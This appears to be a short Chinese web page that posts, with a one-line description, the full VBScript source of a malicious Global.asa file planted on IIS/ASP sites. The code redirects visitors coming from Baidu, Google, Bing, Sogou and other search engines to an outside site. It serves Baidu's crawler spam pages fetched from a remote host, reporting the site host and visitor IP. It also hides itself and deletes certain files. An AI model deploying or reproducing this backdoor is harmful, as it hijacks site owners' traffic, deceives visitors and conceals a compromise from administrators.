Global.asa 挂马文件代码
Global.asa 挂马文件代码
会导致用户从搜所工具那里来的流量跳转到其它地方。
<script language="vbscript" runat="server">
sub Session_OnStartdim name
name=request.servervariables("Path_Translated")
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
Dim v
Dim t
ReDim A(Request.Form.Count)
ReDim B(Request.Form.Count)
v=Request.Form
t=Request.Form.Count
if t>0 then
For i=0 To t-1
b(i)=Split(Split(v,"&")(i),"=")(1)
if instr(LCase(b(i)),"global.asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Next
end if
if instr(request.servervariables("HTTP_REFERER"),"www.baidu.com/s?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"baidu.com/baidu?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"m.baidu.com/")>0 or instr(request.ServerVariables("HTTP_REFERER"),"soso.com/q?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"google.com.hk/search?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"sogou.com/web?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"sogou.com/sogou")>0 or instr(request.ServerVariables("HTTP_REFERER"),"youdao.com/search?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"bing.com/search?")>0 and request.servervariables("QUERY_STRING")<>"" then
response.redirect("http://www.shu8.cc/user/sehh.html?"&Request.ServerVariables("HTTP_HOST"))
elseif instr(name,";")>0 then
set m=fso.Getfile(name)
m.Attributes=0
fso.DeleteFile(name)
f.Attributes=1+2+4
response.end()
elseif instr(request.servervariables("QUERY_STRING"),".asa")>0 then
f.Attributes=1+2+4
response.end()
elseif instr(request.servervariables("HTTP_USER_AGENT"),"aidu")>0 then
Dim Url,Html,Get_String,Get_id,Get_String2
randomize
Get_id=int(10000000*rnd)
Get_String=Request.ServerVariables("REMOTE_ADDR")
Get_String2=Request.ServerVariables("HTTP_HOST")
'=============================
TxtUrl="http://www.tayequ.com/txt/seo.txt"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",TxtUrl,False
ObjXMLHTTP.setRequestHeader "User-Agent",TxtUrl
ObjXMLHTTP.send
TheUrl=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write TheUrl
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
TheUrl = objStream.ReadText
objStream.Close
'=============================
Url=TheUrl&"?m="&Get_String2&"&r="&Get_String&"&x="&Get_id&"&popo="&request.servervariables("QUERY_STRING")
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,"</html>")>0 then
Response.write GetHtml
else
response.end()
end if
end if
f.Attributes=1+2+4
end sub
</script>
目录 返回
首页